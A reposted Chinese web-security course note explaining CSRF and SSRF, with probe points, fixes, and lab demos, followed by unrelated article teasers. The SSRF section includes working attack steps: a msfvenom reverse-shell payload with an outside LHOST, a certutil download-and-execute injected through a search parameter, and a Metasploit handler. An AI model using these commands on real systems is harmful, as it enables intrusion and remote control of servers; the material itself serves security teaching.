小迪安全39WEB 攻防-通用漏洞CSRFSSRF协议玩法内网探针漏洞利用

news2024/12/26 21:16:06

#知识点: 逻辑漏洞

1CSRF-原理&危害&探针&利用等

2SSRF-原理&危害&探针&利用等

3CSRF&SSRF-黑盒下漏洞探针点

#详细点:

CSRF 全称:Cross-site request forgery,即,跨站请求伪造,也被称为 “One

Click Attack” “Session Riding”,通常缩写为 CSRF 或者 XSRF,是一种对网

站的恶意利用。举个生活中的例子:就是某个人点了个奇怪的链接,自己什么也没输,但

自己的 qq 号或其他的号就被盗了。即该攻击可以在受害者不知情的情况下以受害者名义

伪造请求,执行恶意操作,具有很大的危害性。

CSRF 的攻击过程两个条件:

1、目标用户已经登录了网站,能够执行网站的功能。

2、目标用户访问了攻击者构造的 URL

CSRF 安全问题黑盒怎么判断:

  1. 看验证来源不-修复 ——同源策略

    Referer:检测同源,但不是绝对的安全,此头部可以被抓取修改的

  2. 看凭据有无 token--修复

Token:一种标识,每操作一次,都会进行更改

3、看关键操作有无验证-修复

-CSRF 安全问题白盒怎么审计:

同黑盒思路一样,代码中分析上述三看

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形

成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问

的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离

的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功

能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容,加载指定

地址的图片,下载等等。

-SSRF 黑盒可能出现的地方:

这些是都会向服务器去请求我们所发送的信息,若配置不当,我们输入了访问它自身的地址,则会回显出它自身的情况

1.社交分享功能:获取超链接的标题等内容进行显示

2.转码服务:通过 URL 地址把原地址的网页内容调优使其适合手机屏幕浏览

3.在线翻译:给网址翻译对应网页的内容

4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过 URL 地址加载或下

载图片

5.图片/文章收藏功能:主要其会取 URL 地址中 title 以及文本的内容作为显示以求一

个好的用具体验

6.云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的

信息,就可以进行 ssrf 测试

7.网站采集,网站抓取的地方:一些网站会针对你输入的 url 进行一些信息采集工作

8.数据库内置功能:数据库的比如mongodb的copyDatabase函数
9。邮件系统:比如接收邮件服务器地址
10.编码处理,属性信息处理,文件处理:比如ffpmg,ImageMagick, docx, pdf, xml处理器等
11.未公开的api实现以及其他扩展调用URL的功能:可以利用google 语法(inurl:)加上这些关键字去寻找SSRF漏洞一些的url中的关键字: share. wap、 url、 link. src、 source. target. U、3g、 display、sourceURI、imageURL. domain..
12从远程服务器请求资源(upload from url如discuz! ; import & expost rss feed如weDblog;使用了xml引擎对象的地方如wordpress xmlrpc.php)


-SSRF白盒可能出现的地方:
1、功能点抓包指向代码块审计
2、功能点函数定位代码块审计

-SSRF常见安全修复防御方案:

1.禁用跳转

2、禁用不需要的协议

3、固定或限制资源地址

4、错误信局统一信息处理


#系列内容点:

1、 CSRF&SSRF&原理&利用&协议等

2、 CSRF&SSRF&黑盒&审计&修复等

CSRF-原理&后台自动添加管理员

Ø  SSRF-原理&服务&协议&内网&漏洞

Ø  SSRF-某实际案例测试演示(功能点)

#CSRF-原理&后台自动添加管理员

-案例说明:小迪在登录后台管理自己网站的时候,突然群里给小迪说阿祖又说爱上别人

了,随后给我发了个 URL 链接,小迪直接点了进去,GG

小迪的网站:http://test.xiaodi8.com/

发送的 URLhttp://47.94.236.117/add.html

点击了此链接,管理员就突然多了一个

需要对网站源码有一定了解,调试合理的数据包

通过调式数据包,进行构造对应的链接地址

利用流程:

1、获取目标的触发数据包

2、利用 CSRFTester 构造导出

3、诱使受害者访问特定地址触发

#SSRF-原理&服务&协议&内网&漏洞

-参考文章:https://www.t00ls.cc/articles-41070.html

-案例说明:小迪在本地创建了远程图片文件加载应用,直接被攻击者利用 SSRF 探针本

地及内网服务,并利用某漏洞直接获取到内网某主机的权限!

解决了内部通讯的问题

1、服务探针:

http://127.0.0.1/ssrf.php

图片功能:

用户:自己将电脑的图片上传,自己给一个URL让服务器解析上传

  1. 可本地上传到服务器
  2. 远程加载图片地址上传服务器

服务器:

  1. 访问图片地址
  2. 下载图片上传服务器

故:自己上给自己内部请求,达到服务器伪造请求

可以做探针,去探它的内部资源和端口资源

http://127.0.0.1/

http://127.0.0.1:3306/ ——说明本地有安装mysql

内网IP私有地址:

A:10.0.0.0~10.255.255.255

B:172.16.0.0~172.31.255.255

C:192.168.0.0~192.168.255.255

为此我们使用虚拟机来充当内网,进行检测

在虚拟机中构造一个8080端口来进行端口检测

内网捕获成功

注:一般的实战中内网会去做一些IP覆盖等保护手段(如CDN)

2、协议玩法:

file:///D:/w.txt

dict://127.0.0.1:3306/info

ftp://192.168.46.148:21

3、内网扫描:

http://192.168.46.148:8080

以黑盒的角度:对其内网地址进行爆破扫描

4、漏洞利用(理想):

-生成xx.exe:msfvenom -p windows/meterpreter/reverse_http LHOST=47.94.236.117 LPORT=6688 -f exe -o xx.exe


生成文件下载口令certutil.exe -urlcache -split -f http://192.168.162.142:80/xx.exe xx.exe

-监听:

msfconsole

 

上传木马http://192.168.162.138:8080/?search==%00{.exec|cmd.exe%20/c%20certutil%20-urlcache%20-split%20-f%20http://47.94.236.117/xx.exe.}

建立会话

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

设置监听状态

set lhost 0.0.0.0

set lport 6688

run

-执行木马:

http://192.168.162.138:8080/?search==%00{.exec|xx.exe.}

上线:

查看服务器端(虚拟机)的任务状态

通常可能会被防火墙等拦截,木马查杀,协议不支持等

#SSRF-某实际案例测试演示(功能点)

基于上述的 SSRF 的漏洞原理,漏洞探针开展黑盒思路分析那些可能存在

1.

正常输入127.0.0.1

当输入http://127.0.0.1,发现页面变了,说明存在ssrf,只是不知道它过滤了多少协议

2.

修改url的内容,访问本地服务器

出了回显,说明存在ssrf

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1512540.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

十四、软考-系统架构设计师笔记-云原生架构设计理论与实践

1、云原生架构背景 云原生架构定义 从技术的角度,云原生架构是基于云原生技术的一组架构原则和设计模式的集合,旨在将云应用中的非业务代码部分进行最大化的剥离,从而让云设施接管应用中原有的大量非功能特性(如弹性、韧性、安全、可观测性、…

图片怎样去水印?三款热门工具推荐!

在数字化时代,图片去水印成为了许多设计师、摄影师和普通用户的基本需求。面对市面上琳琅满目的去水印工具,究竟哪款应用能够在效果、易用性和效率上更胜一筹呢?今天,就让我们来对比三款国内外热门的图片去水印应用,看…

基于pci多功能采集卡——pci9640

一、追逐潮流,应运而生 信息社会的高速发展,在很大程度上取决于信息与信号处理的先进性。数字信号处理技术的出现改变了信号与信号处理技术的整个面貌,而数据采集作为数字信号处理的必不可少的前期工作在整个数字系统中起到关键性乃至决定性的…

250V FDP51N25 N沟道功率MOSFET具有业界领先的低导通电阻特性,有助于提供出色的开关性能

FDP51N25 UniFETTM MOSFET 是基于平面条纹和 DMOS 技术的高压 MOSFET。适用于降低导通电阻,提供更好的开关性能以及更高的雪崩能量强度。FDP51N25适用于开关电源转换器应用,如功率因数校正 (PFC)、平板显示屏 (FPD) TV 电源、ATX 和电子灯镇流器。 FDP51…

数学建模-模糊性综合评价模型

中医药是中国传统文化的重要组成部分,凝聚了中华民族千百年来智慧的结晶。作为中医的发源地,中国政府一直致力于保护、发展和推广中医药,采取了一系列政策措施[]。目前,中国面临着老龄化日益加剧,老年人群中慢性疾病和…

Elasticsearch使用Kibana进行基础操作

一、Restful接口 Elasticsearch通过RESTful接口提供与其进行交互的方式。在ES中,提供了功能丰富的RESTful API的操作,包括CRUD、创建索引、删除索引等操作。你可以用你最喜爱的 web 客户端访问 Elasticsearch 。事实上,你甚至可以使用 curl …

力扣每日一题 在受污染的二叉树中查找元素 哈希 DFS 二进制

Problem: 1261. 在受污染的二叉树中查找元素 思路 👨‍🏫 灵神题解 💖 二进制 时间复杂度:初始化为 O ( 1 ) O(1) O(1);find 为 O ( m i n ( h , l o g 2 t a r g e t ) O(min(h,log_2target) O(min(h,log2​targ…

八路DI八路DO,开关量转RS-485/232,数据采集远程I/O模块 YL60

特点: ● 八路开关量输入,八路开关量输出 ● 通过RS-485/232接口可以读取输入的电平状态 ● 通过RS-485/232接口可以设定输出状态 ● 信号输入,输出及电源之间不隔离 ● 宽电源供电范围:8 ~ 32VDC ● 可靠性高,…

UI 学习 二 可访问性 模式

一 颜色对比 颜色和对比度可以用来帮助用户看到和理解应用程序的内容,与正确的元素交互,并理解操作。 颜色可以帮助传达情绪、语气和关键信息。可以选择主色、辅助色和强调色来支持可用性。元素之间足够的颜色对比可以帮助低视力的用户看到和使用你的应…

【面试精讲】Java线程6种状态和工作原理详解,Java创建线程的4种方式

Java线程6种状态和工作原理详解,Java创建线程的4种方式 目录 一、Java线程的六种状态 二、Java线程是如何工作的? 三、BLOCKED 和 WAITING 的区别 四、start() 和 run() 源码分析 五、Java创建线程的所有方式和代码详解 1. 继承Thread类 2. 实现…

数据结构从入门到精通——树和二叉树

树和二叉树 前言一、树概念及结构1.1树的概念1.2 树的相关概念(重要)1.3 树的表示1.4 树在实际中的运用(表示文件系统的目录树结构) 二、二叉树概念及结构2.1二叉树概念2.2现实中的二叉树2.3 特殊的二叉树2.4 二叉树的性质2.5 二叉…

Linux-gdb调试

文章目录 前言查看(显示)源代码 list/l运行程序run/r打断点b查看断点删除断点打开/关闭断点逐过程 逐语句查看变量常显示continuefinishuntil修改指定变量退出gdb 前言 GDB,即GNU调试器(GNU Debugger),是G…

【AI绘画】AI绘画免费网站推荐

人工智能(Artificial Intelligence,简称AI)是指一种模拟人类智能的技术。它是通过计算机系统来模拟人的认知、学习和推理能力,以实现类似于人类智能的行为和决策。人工智能技术包含多个方面,包括机器学习、深度学习、自…

JSON基础知识

目录 一、定义二、作用三、特点四、语法JSON具有以下这些形式:4.1 对象(JSONObject):4.2 数组(JSONArray):4.3 值4.4 字符串4.5 数值 五、常用的JSON解析方式5.1 org.json解析5.1.1 常用api5.1.2 get方法与opt方法对比5.1.3 使用示例5.1.3 参…

如何处理爬虫代理的404错误

目录 前言 一、什么是404错误 二、处理404错误的方法 1. 重新尝试请求 2. 使用备用代理 3. 日志记录 总结 前言 在进行网络爬虫开发过程中,经常会遇到一些特殊的错误,例如404错误。当我们使用代理服务器进行网络爬取时,有时候会遇到4…

C#,红黑树(Red-Black Tree)的构造,插入、删除及修复、查找的算法与源代码

1 红黑树(Red-Black Tree) 如果二叉搜索树满足以下红黑属性,则它是红黑树: 每个节点不是红色就是黑色。根是黑色的。每片叶子(无)都是黑色的。如果一个节点是红色的,那么它的两个子节点都是黑色的。对于每个节点,从节点到后代叶的所有路径都包含相同数量的黑色节点。红…

YOLOv8改进 | 图像去雾 | 利用图像去雾网络AOD-PONO-Net网络增改进图像物体检测

一、本文介绍 本文给大家带来的改进机制是利用AODNet图像去雾网络结合PONO机制实现二次增强,我将该网络结合YOLOv8针对图像进行去雾检测(也适用于一些模糊场景,图片不清晰的检测),同时本文的内容不影响其它的模块改进可以作为工作量凑近大家的论文里,非常的适用,图像去…

【线代基础】张量、向量、标量、矩阵的区别

1、标量(Scalar) 纯数字,无方向性、无维度概念。因此也叫 标量张量、零维张量、0D张量 例如,x18,x21.34 x1、x2即为标量 2、张量(tensor) 具有方向性,可以理解为一个多维数组&a…

【报错】File ‘xxx.ui‘ is not valid

Q: Pysider6中设计好的ui转py时,出现File ‘xxx.ui’ is not valid A: 重新配置外部工具 $FileName$ -o $FileNameWithoutExtension$.py $FileDir$

中间件 Redis 服务集群的部署方案

前言 在互联网业务发展非常迅猛的早期,如果预算不是问题,强烈建议使用“增强单机硬件性能”的方式提升系统并发能力,因为这个阶段,公司的战略往往是发展业务抢时间,而“增强单机硬件性能”往往是最快的方法。 正是在这…